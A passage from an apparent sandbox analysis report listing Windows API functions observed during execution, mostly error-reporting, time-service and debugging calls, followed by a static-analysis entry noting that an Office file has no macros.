  612. "kernel32.dll.GetVolumeInformationW",
  613. "kernel32.dll.GetCurrentDirectoryW",
  614. "kernel32.dll.GetLastError",
  615. "kernel32.dll.GetStdHandle",
  616. "kernel32.dll.GetConsoleMode",
  617. "kernel32.dll.SetEvent",
  618. "kernel32.dll.FindFirstFileW",
  619. "kernel32.dll.FindClose",
  620. "mscoree.dll.DllGetClassObject",
  621. "diasymreader.dll.DllGetClassObjectInternal",
  622. "kernel32.dll.GetConsoleOutputCP",
  623. "gdi32.dll.TranslateCharsetInfo",
  624. "kernel32.dll.SetConsoleTextAttribute",
  625. "kernel32.dll.WriteConsoleW",
  626. "mscoree.dll.CorExitProcess",
  627. "mscorwks.dll.CorExitProcess",
  628. "mscorwks.dll._CorDllMain",
  629. "kernel32.dll.CreateActCtxW",
  630. "kernel32.dll.AddRefActCtx",
  631. "kernel32.dll.ReleaseActCtx",
  632. "kernel32.dll.ActivateActCtx",
  633. "kernel32.dll.DeactivateActCtx",
  634. "kernel32.dll.GetCurrentActCtx",
  635. "kernel32.dll.QueryActCtxW",
  636. "netutils.dll.NetApiBufferFree",
  637. "kernel32.dll.IsProcessorFeaturePresent",
  638. "ntdll.dll.RtlUnwind",
  639. "mscoree.dll._CorExeMain",
  640. "mscoree.dll._CorImageUnloading",
  641. "mscoree.dll._CorValidateImage",
  642. "cryptsp.dll.CryptExportKey",
  643. "cryptsp.dll.CryptCreateHash",
  644. "kernel32.dll.SwitchToThread",
  645. "rpcrt4.dll.UuidFromStringW",
  646. "rpcrt4.dll.RpcBindingCreateW",
  647. "rpcrt4.dll.RpcBindingBind",
  648. "sechost.dll.OpenSCManagerW",
  649. "sechost.dll.OpenServiceW",
  650. "sechost.dll.StartServiceW",
  651. "sechost.dll.CloseServiceHandle",
  652. "sechost.dll.LookupAccountNameLocalW",
  653. "advapi32.dll.LookupAccountSidW",
  654. "sechost.dll.LookupAccountSidLocalW",
  655. "ole32.dll.CoInitializeSecurity",
  656. "w32time.dll.SvchostEntry_W32Time",
  657. "w32time.dll.SvchostPushServiceGlobals",
  658. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  659. "ws2_32.dll.#115",
  660. "ws2_32.dll.#111",
  661. "userenv.dll.RegisterGPNotification",
  662. "gpapi.dll.RegisterGPNotificationInternal",
  663. "sechost.dll.QueryServiceConfigW",
  664. "dsrole.dll.DsRoleGetPrimaryDomainInformation",
  665. "dsrole.dll.DsRoleFreeMemory",
  666. "sspicli.dll.LsaRegisterPolicyChangeNotification",
  667. "w32time.dll.TimeProvClose",
  668. "w32time.dll.TimeProvCommand",
  669. "w32time.dll.TimeProvOpen",
  670. "ws2_32.dll.getaddrinfo",
  671. "ws2_32.dll.freeaddrinfo",
  672. "ws2_32.dll.#23",
  673. "ws2_32.dll.WSAEventSelect",
  674. "vmictimeprovider.dll.TimeProvClose",
  675. "vmictimeprovider.dll.TimeProvCommand",
  676. "vmictimeprovider.dll.TimeProvOpen",
  677. "advapi32.dll.EventRegister",
  678. "advapi32.dll.EventEnabled",
  679. "advapi32.dll.EventWrite",
  680. "ws2_32.dll.WSAAddressToStringW",
  681. "ws2_32.dll.#3",
  682. "ws2_32.dll.#116",
  683. "advapi32.dll.EventUnregister",
  684. "sspicli.dll.LsaUnregisterPolicyChangeNotification",
  685. "userenv.dll.UnregisterGPNotification",
  686. "gpapi.dll.UnregisterGPNotificationInternal",
  687. "wersvc.dll.ServiceMain",
  688. "wersvc.dll.SvchostPushServiceGlobals",
  689. "faultrep.dll.WerpInitiateCrashReporting",
  690. "wer.dll.WerpCreateMachineStore",
  691. "shell32.dll.SHGetFolderPathEx",
  692. "userenv.dll.CreateEnvironmentBlock",
  693. "sspicli.dll.GetUserNameExW",
  694. "userenv.dll.DestroyEnvironmentBlock",
  695. "wer.dll.WerpSvcReportFromMachineQueue",
  696. "advapi32.dll.DuplicateToken",
  697. "wtsapi32.dll.WTSQueryUserToken",
  698. "winsta.dll.WinStationQueryInformationW",
  699. "advapi32.dll.CreateWellKnownSid",
  700. "rpcrt4.dll.RpcStringBindingComposeW",
  701. "rpcrt4.dll.RpcBindingFromStringBindingW",
  702. "rpcrt4.dll.RpcStringFreeW",
  703. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  704. "rpcrt4.dll.NdrClientCall3",
  705. "advapi32.dll.ImpersonateLoggedOnUser",
  706. "advapi32.dll.CreateProcessAsUserW",
  707. "advapi32.dll.RevertToSelf",
  708. "imm32.dll.ImmDisableIME",
  709. "wer.dll.WerpCreateIntegratorReportId",
  710. "wer.dll.WerReportCreate",
  711. "wer.dll.WerpSetIntegratorReportId",
  712. "wer.dll.WerReportSetParameter",
  713. "dbgeng.dll.DebugCreate",
  714. "ntdll.dll.CsrGetProcessId",
  715. "ntdll.dll.DbgBreakPoint",
  716. "ntdll.dll.DbgPrint",
  717. "ntdll.dll.DbgPrompt",
  718. "ntdll.dll.DbgUiConvertStateChangeStructure",
  719. "ntdll.dll.DbgUiGetThreadDebugObject",
  720. "ntdll.dll.DbgUiIssueRemoteBreakin",
  721. "ntdll.dll.DbgUiSetThreadDebugObject",
  722. "ntdll.dll.NtAllocateVirtualMemory",
  723. "ntdll.dll.NtClose",
  724. "ntdll.dll.NtCreateDebugObject",
  725. "ntdll.dll.NtCreateFile",
  726. "ntdll.dll.NtDebugActiveProcess",
  727. "ntdll.dll.NtDebugContinue",
  728. "ntdll.dll.NtFreeVirtualMemory",
  729. "ntdll.dll.NtOpenProcess",
  730. "ntdll.dll.NtOpenThread",
  731. "ntdll.dll.NtQueryInformationProcess",
  732. "ntdll.dll.NtQueryInformationThread",
  733. "ntdll.dll.NtQueryMutant",
  734. "ntdll.dll.NtQueryObject",
  735. "ntdll.dll.NtRemoveProcessDebug",
  736. "ntdll.dll.NtResumeThread",
  737. "ntdll.dll.NtSetInformationDebugObject",
  738. "ntdll.dll.NtSetInformationProcess",
  739. "ntdll.dll.NtSystemDebugControl",
  740. "ntdll.dll.NtWaitForDebugEvent",
  741. "ntdll.dll.RtlAnsiStringToUnicodeString",
  742. "ntdll.dll.RtlCreateProcessParameters",
  743. "ntdll.dll.RtlCreateUserProcess",
  744. "ntdll.dll.RtlDestroyProcessParameters",
  745. "ntdll.dll.RtlDosPathNameToNtPathName_U",
  746. "ntdll.dll.RtlFindMessage",
  747. "ntdll.dll.RtlFreeHeap",
  748. "ntdll.dll.RtlFreeUnicodeString",
  749. "ntdll.dll.RtlGetFunctionTableListHead",
  750. "ntdll.dll.RtlGetUnloadEventTrace",
  751. "ntdll.dll.RtlGetUnloadEventTraceEx",
  752. "ntdll.dll.RtlInitAnsiString",
  753. "ntdll.dll.RtlInitUnicodeString",
  754. "ntdll.dll.RtlTryEnterCriticalSection",
  755. "ntdll.dll.RtlUnicodeStringToAnsiString",
  756. "ntdll.dll.NtOpenProcessToken",
  757. "ntdll.dll.NtOpenThreadToken",
  758. "ntdll.dll.NtQueryInformationToken",
  759. "kernel32.dll.CloseProfileUserMapping",
  760. "kernel32.dll.CreateToolhelp32Snapshot",
  761. "kernel32.dll.DebugActiveProcessStop",
  762. "kernel32.dll.DebugBreak",
  763. "kernel32.dll.DebugBreakProcess",
  764. "kernel32.dll.DebugSetProcessKillOnExit",
  765. "kernel32.dll.Module32First",
  766. "kernel32.dll.Module32FirstW",
  767. "kernel32.dll.Module32Next",
  768. "kernel32.dll.Module32NextW",
  769. "kernel32.dll.OpenThread",
  770. "kernel32.dll.Process32First",
  771. "kernel32.dll.Process32FirstW",
  772. "kernel32.dll.Process32Next",
  773. "kernel32.dll.Process32NextW",
  774. "kernel32.dll.ProcessIdToSessionId",
  775. "kernel32.dll.SetProcessShutdownParameters",
  776. "kernel32.dll.Thread32First",
  777. "kernel32.dll.Thread32Next",
  778. "kernel32.dll.GetTimeZoneInformation",
  779. "kernel32.dll.DuplicateHandle",
  780. "kernel32.dll.Wow64GetThreadSelectorEntry",
  781. "advapi32.dll.CloseServiceHandle",
  782. "advapi32.dll.ControlService",
  783. "advapi32.dll.CreateServiceA",
  784. "advapi32.dll.CreateServiceW",
  785. "advapi32.dll.DeleteService",
  786. "advapi32.dll.EnumServicesStatusExA",
  787. "advapi32.dll.EnumServicesStatusExW",
  788. "advapi32.dll.GetEventLogInformation",
  789. "advapi32.dll.OpenSCManagerA",
  790. "advapi32.dll.OpenSCManagerW",
  791. "advapi32.dll.OpenServiceA",
  792. "advapi32.dll.OpenServiceW",
  793. "advapi32.dll.StartServiceA",
  794. "advapi32.dll.StartServiceW",
  795. "advapi32.dll.GetSidSubAuthority",
  796. "advapi32.dll.GetSidSubAuthorityCount",
  797. "version.dll.GetFileVersionInfoSizeExW",
  798. "version.dll.GetFileVersionInfoExW",
  799. "dbghelp.dll.WinDbgExtensionDllInit",
  800. "dbghelp.dll.ExtensionApiVersion",
  801. "wer.dll.WerpSetDynamicParameter",
  802. "wer.dll.WerReportAddDump",
  803. "wer.dll.WerpSetCallBack",
  804. "wer.dll.WerReportSetUIOption",
  805. "wer.dll.WerpAddRegisteredDataToReport",
  806. "wer.dll.WerReportSubmit",
  807. "user32.dll.LoadStringW",
  808. "advapi32.dll.RegCreateKeyExW",
  809. "sensapi.dll.IsNetworkAlive",
  810. "user32.dll.CharUpperW",
  811. "wer.dll.WerpAddAppCompatData",
  812. "apphelp.dll.SdbGetFileAttributes",
  813. "apphelp.dll.SdbFormatAttribute",
  814. "apphelp.dll.SdbFreeFileAttributes",
  815. "dbghelp.dll.MiniDumpWriteDump",
  816. "kernel32.dll.GetLongPathNameA",
  817. "kernel32.dll.GetLongPathNameW",
  818. "kernel32.dll.GetProcessTimes",
  819. "advapi32.dll.RegOpenKeyExA",
  820. "advapi32.dll.RegQueryValueExA",
  821. "powrprof.dll.CallNtPowerInformation",
  822. "version.dll.GetFileVersionInfoSizeA",
  823. "version.dll.GetFileVersionInfoA",
  824. "version.dll.VerQueryValueA",
  825. "verifier.dll.VerifierEnumerateResource",
  826. "ntdll.dll.NtSuspendProcess",
  827. "ntdll.dll.NtResumeProcess",
  828. "advapi32.dll.QueryTraceW",
  829. "advapi32.dll.IsValidSid",
  830. "advapi32.dll.GetLengthSid",
  831. "advapi32.dll.CopySid",
  832. "advapi32.dll.AddAccessAllowedAceEx",
  833. "wer.dll.WerpGetStoreLocation",
  834. "wer.dll.WerpGetStoreType",
  835. "wer.dll.WerReportCloseHandle",
  836. "user32.dll.MsgWaitForMultipleObjects",
  837. "wer.dll.WerpFreeString",
  838. "user32.dll.GetProcessWindowStation",
  839. "user32.dll.GetThreadDesktop",
  840. "user32.dll.GetUserObjectInformationW",
  841. "werui.dll.WerUICreate",
  842. "werui.dll.WerUIStart",
  843. "werui.dll.WerUITerminate",
  844. "werui.dll.WerUIDelete"
  845. ]
  846.  
  847. [*] Static Analysis: {
  848. "office": {
  849. "Metadata": {
  850. "HasMacros": "No"
  851. }
  852. }
  853. }